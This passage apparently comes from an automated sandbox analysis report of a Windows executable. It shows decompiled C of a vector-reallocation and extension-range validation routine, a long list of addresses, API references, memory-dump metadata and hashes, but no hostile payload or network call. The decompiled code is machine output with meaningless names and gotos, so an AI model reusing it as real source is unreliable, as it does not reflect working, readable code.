                                                                                                                                                                    												}
                                                                                                                                                                    												if(_t624 > 0x3fffffff) {
                                                                                                                                                                    													E004EE38E("vector<T> too long");
                                                                                                                                                                    												}
                                                                                                                                                                    												if( *(_t774 + 0x20) >= _t624) {
                                                                                                                                                                    													L106:
                                                                                                                                                                    													_t695 =  *(_t774 + 0x28);
                                                                                                                                                                    													goto L107;
                                                                                                                                                                    												} else {
                                                                                                                                                                    													 *(_t774 + 0x20) = 0;
                                                                                                                                                                    													_t823 = _t624;
                                                                                                                                                                    													if(_t624 <= 0) {
                                                                                                                                                                    														L103:
                                                                                                                                                                    														E004EF0C0( *(_t774 + 0x28),  *(_t757 + 0x98), ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2));
                                                                                                                                                                    														_t503 =  *(_t757 + 0x98);
                                                                                                                                                                    														_t774 = _t774 + 0xc;
                                                                                                                                                                    														_t737 =  *(_t757 + 0x9c) - _t503 >> 2;
                                                                                                                                                                    														if(_t503 != 0) {
                                                                                                                                                                    															_push(_t503);
                                                                                                                                                                    															L004EEDBE();
                                                                                                                                                                    															_t774 = _t774 + 4;
                                                                                                                                                                    														}
                                                                                                                                                                    														_t504 =  *(_t774 + 0x20);
                                                                                                                                                                    														 *((intOrPtr*)(_t757 + 0xa0)) = _t504 +  *(_t774 + 0x18) * 4;
                                                                                                                                                                    														 *(_t757 + 0x9c) = _t504 + _t737 * 4;
                                                                                                                                                                    														 *(_t757 + 0x98) = _t504;
                                                                                                                                                                    														goto L106;
                                                                                                                                                                    													}
                                                                                                                                                                    													_push(_t624 * 4);
                                                                                                                                                                    													_t506 = L004EF8DA(_t560, _t624, _t624 * 4, 0, _t757, _t823);
                                                                                                                                                                    													_t774 = _t774 + 4;
                                                                                                                                                                    													 *(_t774 + 0x20) = _t506;
                                                                                                                                                                    													if(_t506 == 0) {
                                                                                                                                                                    														 *((intOrPtr*)(_t774 + 0x38)) = 0;
                                                                                                                                                                    														 *(_t774 + 0x34) = 0x52fd98;
                                                                                                                                                                    														_t757 = _t774 + 0x34;
                                                                                                                                                                    														 *(_t774 + 0x3a4) = 4;
                                                                                                                                                                    														_t475 = E00404190(_t757);
                                                                                                                                                                    														goto L110;
                                                                                                                                                                    													}
                                                                                                                                                                    													goto L103;
                                                                                                                                                                    												}
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    										do {
                                                                                                                                                                    											_t659 = _t771;
                                                                                                                                                                    											L004799D0( *(_t774 + 0x1c), _t771,  *((intOrPtr*)( *((intOrPtr*)(_t560 + 0x4c)) + _t718 * 4)), _t771,  *(_t771 + 0x34) + _t718 * 8);
                                                                                                                                                                    											_t718 = _t718 + 1;
                                                                                                                                                                    										} while (_t718 <  *((intOrPtr*)(_t560 + 0x50)));
                                                                                                                                                                    										goto L86;
                                                                                                                                                                    									}
                                                                                                                                                                    									_push(_t416);
                                                                                                                                                                    									_t510 = L004EF8DA(_t560, _t571, _t659, _t717, _t756, _t801);
                                                                                                                                                                    									_t766 = _t756 + 0x98;
                                                                                                                                                                    									 *(_t774 + 0x18) = _t510;
                                                                                                                                                                    									_t511 = _t766[1];
                                                                                                                                                                    									_t659 = _t774 + 0x18;
                                                                                                                                                                    									_t774 = _t774 + 4;
                                                                                                                                                                    									if(_t659 >= _t511) {
                                                                                                                                                                    										L70:
                                                                                                                                                                    										_t630 = _t766[2];
                                                                                                                                                                    										__eflags = _t511 - _t630;
                                                                                                                                                                    										if(_t511 == _t630) {
                                                                                                                                                                    											_t659 =  *_t766;
                                                                                                                                                                    											_t514 = _t511 - _t659 >> 2;
                                                                                                                                                                    											__eflags = _t514 - 0x3ffffffe;
                                                                                                                                                                    											if(_t514 > 0x3ffffffe) {
                                                                                                                                                                    												_t514 = E004EE38E("vector<T> too long");
                                                                                                                                                                    											}
                                                                                                                                                                    											_t515 = _t514 + 1;
                                                                                                                                                                    											_t632 = _t630 - _t659 >> 2;
                                                                                                                                                                    											__eflags = _t515 - _t632;
                                                                                                                                                                    											if(_t515 > _t632) {
                                                                                                                                                                    												_t659 = _t632 >> 1;
                                                                                                                                                                    												__eflags = 0x3fffffff - _t659 - _t632;
                                                                                                                                                                    												if(0x3fffffff - _t659 >= _t632) {
                                                                                                                                                                    													_t633 = _t632 + _t659;
                                                                                                                                                                    													__eflags = _t633;
                                                                                                                                                                    												} else {
                                                                                                                                                                    													_t633 = 0;
                                                                                                                                                                    												}
                                                                                                                                                                    												__eflags = _t633 - _t515;
                                                                                                                                                                    												if(_t633 < _t515) {
                                                                                                                                                                    													_t633 = _t515;
                                                                                                                                                                    												}
                                                                                                                                                                    												L0041FEF0(_t766, _t633);
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    										_t512 = _t766[1];
                                                                                                                                                                    										__eflags = _t512;
                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                    											_t659 =  *(_t774 + 0x14);
                                                                                                                                                                    											 *_t512 =  *(_t774 + 0x14);
                                                                                                                                                                    										}
                                                                                                                                                                    										L82:
                                                                                                                                                                    										_t766[1] = _t766[1] + 4;
                                                                                                                                                                    										_t416 =  *(_t774 + 0x14);
                                                                                                                                                                    										goto L83;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t740 =  *_t766;
                                                                                                                                                                    									if(_t740 > _t659) {
                                                                                                                                                                    										goto L70;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t635 = _t766[2];
                                                                                                                                                                    									_t705 = _t659 - _t740 >> 2;
                                                                                                                                                                    									 *(_t774 + 0x28) = _t705;
                                                                                                                                                                    									if(_t511 == _t635) {
                                                                                                                                                                    										_t520 = _t511 - _t740 >> 2;
                                                                                                                                                                    										if(_t520 > 0x3ffffffe) {
                                                                                                                                                                    											_t520 = E004EE38E("vector<T> too long");
                                                                                                                                                                    										}
                                                                                                                                                                    										_t521 = _t520 + 1;
                                                                                                                                                                    										_t638 = _t635 - _t740 >> 2;
                                                                                                                                                                    										if(_t521 > _t638) {
                                                                                                                                                                    											_t707 = _t638 >> 1;
                                                                                                                                                                    											if(0x3fffffff - _t707 >= _t638) {
                                                                                                                                                                    												_t639 = _t638 + _t707;
                                                                                                                                                                    												__eflags = _t639;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												_t639 = 0;
                                                                                                                                                                    											}
                                                                                                                                                                    											if(_t639 < _t521) {
                                                                                                                                                                    												_t639 = _t521;
                                                                                                                                                                    											}
                                                                                                                                                                    											L0041FEF0(_t766, _t639);
                                                                                                                                                                    											_t705 =  *(_t774 + 0x28);
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    									_t659 =  *_t766 + _t705 * 4;
                                                                                                                                                                    									_t518 = _t766[1];
                                                                                                                                                                    									if(_t518 != 0) {
                                                                                                                                                                    										 *_t518 =  *_t659;
                                                                                                                                                                    									}
                                                                                                                                                                    									goto L82;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t767 = 0;
                                                                                                                                                                    								do {
                                                                                                                                                                    									_t659 =  *(_t771 + 0x2c) + _t767;
                                                                                                                                                                    									_push( *(_t771 + 0x2c) + _t767);
                                                                                                                                                                    									_push(_t771);
                                                                                                                                                                    									L00479B00( *((intOrPtr*)( *((intOrPtr*)( *(_t774 + 0x30) + 0x3c)) + _t717 * 4)),  *(_t774 + 0x1c),  *(_t771 + 0x2c) + _t767);
                                                                                                                                                                    									_t717 = _t717 + 1;
                                                                                                                                                                    									_t767 = _t767 + 0x20;
                                                                                                                                                                    								} while (_t717 <  *((intOrPtr*)( *(_t774 + 0x30) + 0x40)));
                                                                                                                                                                    								goto L55;
                                                                                                                                                                    							}
                                                                                                                                                                    							_push(_t411);
                                                                                                                                                                    							_t526 = L004EF8DA(_t559, _t570, _t659, _t716, _t755, _t789);
                                                                                                                                                                    							_t89 = _t716 + 0x98; // 0x9c
                                                                                                                                                                    							_t768 = _t89;
                                                                                                                                                                    							 *(_t774 + 0x18) = _t526;
                                                                                                                                                                    							_t527 = _t768[1];
                                                                                                                                                                    							_t659 = _t774 + 0x18;
                                                                                                                                                                    							_t774 = _t774 + 4;
                                                                                                                                                                    							if(_t659 >= _t527) {
                                                                                                                                                                    								L39:
                                                                                                                                                                    								_t642 = _t768[2];
                                                                                                                                                                    								__eflags = _t527 - _t642;
                                                                                                                                                                    								if(_t527 == _t642) {
                                                                                                                                                                    									_t659 =  *_t768;
                                                                                                                                                                    									_t530 = _t527 - _t659 >> 2;
                                                                                                                                                                    									__eflags = _t530 - 0x3ffffffe;
                                                                                                                                                                    									if(_t530 > 0x3ffffffe) {
                                                                                                                                                                    										_t530 = E004EE38E("vector<T> too long");
                                                                                                                                                                    									}
                                                                                                                                                                    									_t531 = _t530 + 1;
                                                                                                                                                                    									_t644 = _t642 - _t659 >> 2;
                                                                                                                                                                    									__eflags = _t531 - _t644;
                                                                                                                                                                    									if(_t531 > _t644) {
                                                                                                                                                                    										_t659 = _t644 >> 1;
                                                                                                                                                                    										__eflags = 0x3fffffff - _t659 - _t644;
                                                                                                                                                                    										if(0x3fffffff - _t659 >= _t644) {
                                                                                                                                                                    											_t645 = _t644 + _t659;
                                                                                                                                                                    											__eflags = _t645;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_t645 = 0;
                                                                                                                                                                    										}
                                                                                                                                                                    										__eflags = _t645 - _t531;
                                                                                                                                                                    										if(_t645 < _t531) {
                                                                                                                                                                    											_t645 = _t531;
                                                                                                                                                                    										}
                                                                                                                                                                    										L0041FEF0(_t768, _t645);
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								_t528 = _t768[1];
                                                                                                                                                                    								__eflags = _t528;
                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                    									_t659 =  *(_t774 + 0x14);
                                                                                                                                                                    									 *_t528 =  *(_t774 + 0x14);
                                                                                                                                                                    								}
                                                                                                                                                                    								L51:
                                                                                                                                                                    								_t768[1] = _t768[1] + 4;
                                                                                                                                                                    								_t411 =  *(_t774 + 0x14);
                                                                                                                                                                    								goto L52;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t745 =  *_t768;
                                                                                                                                                                    							if(_t745 > _t659) {
                                                                                                                                                                    								goto L39;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t647 = _t768[2];
                                                                                                                                                                    							_t711 = _t659 - _t745 >> 2;
                                                                                                                                                                    							 *(_t774 + 0x28) = _t711;
                                                                                                                                                                    							if(_t527 == _t647) {
                                                                                                                                                                    								_t536 = _t527 - _t745 >> 2;
                                                                                                                                                                    								if(_t536 > 0x3ffffffe) {
                                                                                                                                                                    									_t536 = E004EE38E("vector<T> too long");
                                                                                                                                                                    								}
                                                                                                                                                                    								_t537 = _t536 + 1;
                                                                                                                                                                    								_t650 = _t647 - _t745 >> 2;
                                                                                                                                                                    								if(_t537 > _t650) {
                                                                                                                                                                    									_t713 = _t650 >> 1;
                                                                                                                                                                    									if(0x3fffffff - _t713 >= _t650) {
                                                                                                                                                                    										_t651 = _t650 + _t713;
                                                                                                                                                                    										__eflags = _t651;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t651 = 0;
                                                                                                                                                                    									}
                                                                                                                                                                    									if(_t651 < _t537) {
                                                                                                                                                                    										_t651 = _t537;
                                                                                                                                                                    									}
                                                                                                                                                                    									L0041FEF0(_t768, _t651);
                                                                                                                                                                    									_t711 =  *(_t774 + 0x28);
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    							_t659 =  *_t768 + _t711 * 4;
                                                                                                                                                                    							_t534 = _t768[1];
                                                                                                                                                                    							if(_t534 != 0) {
                                                                                                                                                                    								 *_t534 =  *_t659;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L51;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							 *(_t774 + 0x14) = 0;
                                                                                                                                                                    							do {
                                                                                                                                                                    								_t659 =  *(_t559 + 0x2c);
                                                                                                                                                                    								_t570 = _t715;
                                                                                                                                                                    								E00478010(_t715,  *(_t559 + 0x2c),  *((intOrPtr*)( *(_t559 + 0x2c) + _t755 * 4)), _t771,  *(_t771 + 0x24) +  *(_t774 + 0x14));
                                                                                                                                                                    								 *(_t774 + 0x14) =  *(_t774 + 0x14) + 0x40;
                                                                                                                                                                    								_t755 = _t755 + 1;
                                                                                                                                                                    							} while (_t755 <  *(_t559 + 0x30));
                                                                                                                                                                    							goto L24;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					_push(_t408);
                                                                                                                                                                    					_t541 = L004EF8DA(_t559, _t570, _t659, _t715, _t754, _t781);
                                                                                                                                                                    					_t570 =  *(_t754 + 0x9c);
                                                                                                                                                                    					_t659 = _t774 + 0x18;
                                                                                                                                                                    					_t774 = _t774 + 4;
                                                                                                                                                                    					 *(_t774 + 0x14) = _t541;
                                                                                                                                                                    					if(_t659 >= _t570) {
                                                                                                                                                                    						L16:
                                                                                                                                                                    						__eflags = _t570 -  *((intOrPtr*)(_t754 + 0xa0));
                                                                                                                                                                    						if(_t570 ==  *((intOrPtr*)(_t754 + 0xa0))) {
                                                                                                                                                                    							_t570 = 1;
                                                                                                                                                                    							_t68 = _t754 + 0x98; // 0x9c
                                                                                                                                                                    							E00480450(_t68, 1);
                                                                                                                                                                    						}
                                                                                                                                                                    						_t542 =  *(_t754 + 0x9c);
                                                                                                                                                                    						__eflags = _t542;
                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                    							_t570 =  *(_t774 + 0x14);
                                                                                                                                                                    							 *_t542 =  *(_t774 + 0x14);
                                                                                                                                                                    						}
                                                                                                                                                                    						L20:
                                                                                                                                                                    						 *(_t754 + 0x9c) =  *(_t754 + 0x9c) + 4;
                                                                                                                                                                    						_t408 =  *(_t774 + 0x14);
                                                                                                                                                                    						goto L21;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t659 =  *(_t754 + 0x98);
                                                                                                                                                                    					_t545 = _t774 + 0x14;
                                                                                                                                                                    					if(_t659 > _t545) {
                                                                                                                                                                    						goto L16;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t547 = _t545 - _t659 >> 2;
                                                                                                                                                                    						 *(_t774 + 0x28) = _t547;
                                                                                                                                                                    						if(_t570 ==  *((intOrPtr*)(_t754 + 0xa0))) {
                                                                                                                                                                    							_t61 = _t754 + 0x98; // 0x9c
                                                                                                                                                                    							E00480450(_t61, 1);
                                                                                                                                                                    							_t547 =  *(_t774 + 0x28);
                                                                                                                                                                    						}
                                                                                                                                                                    						_t548 =  *(_t754 + 0x98) + _t547 * 4;
                                                                                                                                                                    						_t570 =  *(_t754 + 0x9c);
                                                                                                                                                                    						if(_t570 != 0) {
                                                                                                                                                                    							_t659 =  *_t548;
                                                                                                                                                                    							 *_t570 =  *_t548;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L20;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *(_t774 + 0x14) = 0;
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t659 =  *( *((intOrPtr*)(_t559 + 0xc)) + _t753 * 4);
                                                                                                                                                                    						_push(0);
                                                                                                                                                                    						_push( *((intOrPtr*)(_t771 + 0x1c)) +  *(_t774 + 0x14));
                                                                                                                                                                    						_push(_t771);
                                                                                                                                                                    						_t570 = _t715;
                                                                                                                                                                    						L00478C70(_t715,  *( *((intOrPtr*)(_t559 + 0xc)) + _t753 * 4));
                                                                                                                                                                    						 *(_t774 + 0x14) =  *(_t774 + 0x14) + 0x48;
                                                                                                                                                                    						_t753 = _t753 + 1;
                                                                                                                                                                    					} while (_t753 <  *(_t559 + 0x10));
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				}
                                                                                                                                                                    			}
                                                                                                                                                                    0x00478758
                                                                                                                                                                    0x0047875a
                                                                                                                                                                    0x00478760
                                                                                                                                                                    0x00478785
                                                                                                                                                                    0x0047878e
                                                                                                                                                                    0x004787b9
                                                                                                                                                                    0x004787b9
                                                                                                                                                                    0x004787bc
                                                                                                                                                                    0x004787be
                                                                                                                                                                    0x004787c6
                                                                                                                                                                    0x004787c6
                                                                                                                                                                    0x004787d5
                                                                                                                                                                    0x004787da
                                                                                                                                                                    0x004787ee
                                                                                                                                                                    0x004787f2
                                                                                                                                                                    0x004787f7
                                                                                                                                                                    0x004787fa
                                                                                                                                                                    0x00478804
                                                                                                                                                                    0x00478a0b
                                                                                                                                                                    0x00478a0f
                                                                                                                                                                    0x00478c3d
                                                                                                                                                                    0x00478c44
                                                                                                                                                                    0x00478c4c
                                                                                                                                                                    0x00478c4d
                                                                                                                                                                    0x00478c4f
                                                                                                                                                                    0x00478c64
                                                                                                                                                                    0x00478c64
                                                                                                                                                                    0x00478a15
                                                                                                                                                                    0x00478a1a
                                                                                                                                                                    0x00478a1e
                                                                                                                                                                    0x00478a30
                                                                                                                                                                    0x00478a33
                                                                                                                                                                    0x00478a37
                                                                                                                                                                    0x00478a3e
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478a44
                                                                                                                                                                    0x00478a44
                                                                                                                                                                    0x00478a44
                                                                                                                                                                    0x00478a47
                                                                                                                                                                    0x00478a4d
                                                                                                                                                                    0x00478a50
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478a56
                                                                                                                                                                    0x00478a5b
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478a6b
                                                                                                                                                                    0x00478a70
                                                                                                                                                                    0x00478a77
                                                                                                                                                                    0x00478a77
                                                                                                                                                                    0x00478a80
                                                                                                                                                                    0x00478a80
                                                                                                                                                                    0x00478a82
                                                                                                                                                                    0x00478a83
                                                                                                                                                                    0x00478a8b
                                                                                                                                                                    0x00478a99
                                                                                                                                                                    0x00478a9e
                                                                                                                                                                    0x00478aa5
                                                                                                                                                                    0x00478aa5
                                                                                                                                                                    0x00478aa8
                                                                                                                                                                    0x00478aa8
                                                                                                                                                                    0x00478aaa
                                                                                                                                                                    0x00478aab
                                                                                                                                                                    0x00478ab4
                                                                                                                                                                    0x00478ac3
                                                                                                                                                                    0x00478ac8
                                                                                                                                                                    0x00478acf
                                                                                                                                                                    0x00478acf
                                                                                                                                                                    0x00478ad2
                                                                                                                                                                    0x00478ad2
                                                                                                                                                                    0x00478ad4
                                                                                                                                                                    0x00478ad5
                                                                                                                                                                    0x00478add
                                                                                                                                                                    0x00478aeb
                                                                                                                                                                    0x00478af0
                                                                                                                                                                    0x00478af7
                                                                                                                                                                    0x00478af7
                                                                                                                                                                    0x00478b00
                                                                                                                                                                    0x00478b00
                                                                                                                                                                    0x00478b02
                                                                                                                                                                    0x00478b03
                                                                                                                                                                    0x00478b09
                                                                                                                                                                    0x00478b12
                                                                                                                                                                    0x00478b19
                                                                                                                                                                    0x00478b20
                                                                                                                                                                    0x00478b27
                                                                                                                                                                    0x00478b2e
                                                                                                                                                                    0x00478b35
                                                                                                                                                                    0x00478b84
                                                                                                                                                                    0x00478b9b
                                                                                                                                                                    0x00478ba2
                                                                                                                                                                    0x00478ba9
                                                                                                                                                                    0x00478bb0
                                                                                                                                                                    0x00478bb7
                                                                                                                                                                    0x00478bbe
                                                                                                                                                                    0x00478bc5
                                                                                                                                                                    0x00478bca
                                                                                                                                                                    0x00478bd5
                                                                                                                                                                    0x00478bed
                                                                                                                                                                    0x00478bef
                                                                                                                                                                    0x00478bf4
                                                                                                                                                                    0x00478c03
                                                                                                                                                                    0x00478c0c
                                                                                                                                                                    0x00478c0d
                                                                                                                                                                    0x00478c12
                                                                                                                                                                    0x00478c12
                                                                                                                                                                    0x00478c15
                                                                                                                                                                    0x00478c19
                                                                                                                                                                    0x00478c19
                                                                                                                                                                    0x00478c1a
                                                                                                                                                                    0x00478c23
                                                                                                                                                                    0x00478c27
                                                                                                                                                                    0x00478c27
                                                                                                                                                                    0x00478c2c
                                                                                                                                                                    0x00478c2d
                                                                                                                                                                    0x00478c30
                                                                                                                                                                    0x00478c34
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478a30
                                                                                                                                                                    0x0047880a
                                                                                                                                                                    0x00478812
                                                                                                                                                                    0x00478815
                                                                                                                                                                    0x00478819
                                                                                                                                                                    0x0047881b
                                                                                                                                                                    0x00478822
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478830
                                                                                                                                                                    0x00478833
                                                                                                                                                                    0x00478836
                                                                                                                                                                    0x0047883b
                                                                                                                                                                    0x00478851
                                                                                                                                                                    0x00478856
                                                                                                                                                                    0x0047885d
                                                                                                                                                                    0x0047885d
                                                                                                                                                                    0x00478860
                                                                                                                                                                    0x00478860
                                                                                                                                                                    0x00478862
                                                                                                                                                                    0x00478863
                                                                                                                                                                    0x00478869
                                                                                                                                                                    0x00478870
                                                                                                                                                                    0x00478876
                                                                                                                                                                    0x00478883
                                                                                                                                                                    0x00478878
                                                                                                                                                                    0x0047887a
                                                                                                                                                                    0x0047887a
                                                                                                                                                                    0x00478890
                                                                                                                                                                    0x0047889f
                                                                                                                                                                    0x004788a4
                                                                                                                                                                    0x004788ab
                                                                                                                                                                    0x004788ab
                                                                                                                                                                    0x004788b0
                                                                                                                                                                    0x004788b0
                                                                                                                                                                    0x004788b2
                                                                                                                                                                    0x004788b3
                                                                                                                                                                    0x004785d9
                                                                                                                                                                    0x004785da
                                                                                                                                                                    0x004785df
                                                                                                                                                                    0x004785df
                                                                                                                                                                    0x004785e2
                                                                                                                                                                    0x004785f0
                                                                                                                                                                    0x004785f6
                                                                                                                                                                    0x004785fc
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004785fc
                                                                                                                                                                    0x0047858b
                                                                                                                                                                    0x0047858c
                                                                                                                                                                    0x00478591
                                                                                                                                                                    0x00478594
                                                                                                                                                                    0x0047859a
                                                                                                                                                                    0x00478626
                                                                                                                                                                    0x0047862a
                                                                                                                                                                    0x00478632
                                                                                                                                                                    0x00478636
                                                                                                                                                                    0x00478641
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478641
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0047859a
                                                                                                                                                                    0x00478574
                                                                                                                                                                    0x00478535
                                                                                                                                                                    0x00478490
                                                                                                                                                                    0x004784a1
                                                                                                                                                                    0x004784a3
                                                                                                                                                                    0x004784a8
                                                                                                                                                                    0x004784a9
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478490
                                                                                                                                                                    0x00478397
                                                                                                                                                                    0x00478398
                                                                                                                                                                    0x0047839d
                                                                                                                                                                    0x004783a3
                                                                                                                                                                    0x004783a7
                                                                                                                                                                    0x004783aa
                                                                                                                                                                    0x004783ae
                                                                                                                                                                    0x004783b3
                                                                                                                                                                    0x00478424
                                                                                                                                                                    0x00478424
                                                                                                                                                                    0x00478427
                                                                                                                                                                    0x00478429
                                                                                                                                                                    0x0047842b
                                                                                                                                                                    0x0047842f
                                                                                                                                                                    0x00478432
                                                                                                                                                                    0x00478437
                                                                                                                                                                    0x0047843e
                                                                                                                                                                    0x0047843e
                                                                                                                                                                    0x00478445
                                                                                                                                                                    0x00478446
                                                                                                                                                                    0x00478449
                                                                                                                                                                    0x0047844b
                                                                                                                                                                    0x0047844f
                                                                                                                                                                    0x00478458
                                                                                                                                                                    0x0047845a
                                                                                                                                                                    0x00478460
                                                                                                                                                                    0x00478460
                                                                                                                                                                    0x0047845c
                                                                                                                                                                    0x0047845c
                                                                                                                                                                    0x0047845c
                                                                                                                                                                    0x00478462
                                                                                                                                                                    0x00478464
                                                                                                                                                                    0x00478466
                                                                                                                                                                    0x00478466
                                                                                                                                                                    0x00478469
                                                                                                                                                                    0x00478469
                                                                                                                                                                    0x0047844b
                                                                                                                                                                    0x0047846e
                                                                                                                                                                    0x00478471
                                                                                                                                                                    0x00478473
                                                                                                                                                                    0x00478475
                                                                                                                                                                    0x00478479
                                                                                                                                                                    0x00478479
                                                                                                                                                                    0x0047847b
                                                                                                                                                                    0x0047847b
                                                                                                                                                                    0x0047847f
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0047847f
                                                                                                                                                                    0x004783b5
                                                                                                                                                                    0x004783bb
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004783bd
                                                                                                                                                                    0x004783c2
                                                                                                                                                                    0x004783c5
                                                                                                                                                                    0x004783cb
                                                                                                                                                                    0x004783cf
                                                                                                                                                                    0x004783d7
                                                                                                                                                                    0x004783de
                                                                                                                                                                    0x004783de
                                                                                                                                                                    0x004783e5
                                                                                                                                                                    0x004783e6
                                                                                                                                                                    0x004783eb
                                                                                                                                                                    0x004783ef
                                                                                                                                                                    0x004783fa
                                                                                                                                                                    0x00478400
                                                                                                                                                                    0x00478400
                                                                                                                                                                    0x004783fc
                                                                                                                                                                    0x004783fc
                                                                                                                                                                    0x004783fc
                                                                                                                                                                    0x00478404
                                                                                                                                                                    0x00478406
                                                                                                                                                                    0x00478406
                                                                                                                                                                    0x00478409
                                                                                                                                                                    0x0047840e
                                                                                                                                                                    0x0047840e
                                                                                                                                                                    0x004783eb
                                                                                                                                                                    0x00478414
                                                                                                                                                                    0x00478417
                                                                                                                                                                    0x0047841c
                                                                                                                                                                    0x00478420
                                                                                                                                                                    0x00478420
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0047841c
                                                                                                                                                                    0x00478345
                                                                                                                                                                    0x00478350
                                                                                                                                                                    0x00478361
                                                                                                                                                                    0x00478363
                                                                                                                                                                    0x00478364
                                                                                                                                                                    0x00478365
                                                                                                                                                                    0x0047836e
                                                                                                                                                                    0x0047836f
                                                                                                                                                                    0x00478372
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00478350
                                                                                                                                                                    0x0047824f
                                                                                                                                                                    0x00478250
                                                                                                                                                                    0x00478255
                                                                                                                                                                    0x00478255
                                                                                                                                                                    0x0047825b
                                                                                                                                                                    0x0047825f
                                                                                                                                                                    0x00478262
                                                                                                                                                                    0x00478266
                                                                                                                                                                    0x0047826b
                                                                                                                                                                    0x004782dc
                                                                                                                                                                    0x004782dc
                                                                                                                                                                    0x004782df
                                                                                                                                                                    0x004782e1
                                                                                                                                                                    0x004782e3
                                                                                                                                                                    0x004782e7
                                                                                                                                                                    0x004782ea
                                                                                                                                                                    0x004782ef
                                                                                                                                                                    0x004782f6
                                                                                                                                                                    0x004782f6
                                                                                                                                                                    0x004782fd
                                                                                                                                                                    0x004782fe
                                                                                                                                                                    0x00478301
                                                                                                                                                                    0x00478303
                                                                                                                                                                    0x00478307
                                                                                                                                                                    0x00478310
                                                                                                                                                                    0x00478312
                                                                                                                                                                    0x00478318
                                                                                                                                                                    0x00478318
                                                                                                                                                                    0x00478314
                                                                                                                                                                    0x00478314
                                                                                                                                                                    0x00478314

                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00478296
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004782F6
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
                                                                                                                                                                      • Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
                                                                                                                                                                      • Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                    • String ID: @$Extension range $0 to $1 includes field "$2" ($3).$Extension range $0 to $1 overlaps with already-defined range $2 to $3.$H$vector<T> too long
                                                                                                                                                                    • API String ID: 963545896-1266223933
                                                                                                                                                                    • Opcode ID: a11c7c738739f06f88fbbfe05f54e115e84336b055124a7cb9c59db826b3f599
                                                                                                                                                                    • Instruction ID: 10159bc02dd46261efd3cc2d2e84f7bc0b2619bf75e8ab0557d5847efac7003f
                                                                                                                                                                    • Opcode Fuzzy Hash: a11c7c738739f06f88fbbfe05f54e115e84336b055124a7cb9c59db826b3f599
                                                                                                                                                                    • Instruction Fuzzy Hash: 158271716043418FC724DF25C984AABB7E5FF88304F148A2EE89E97351EB34E945CB96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 26%
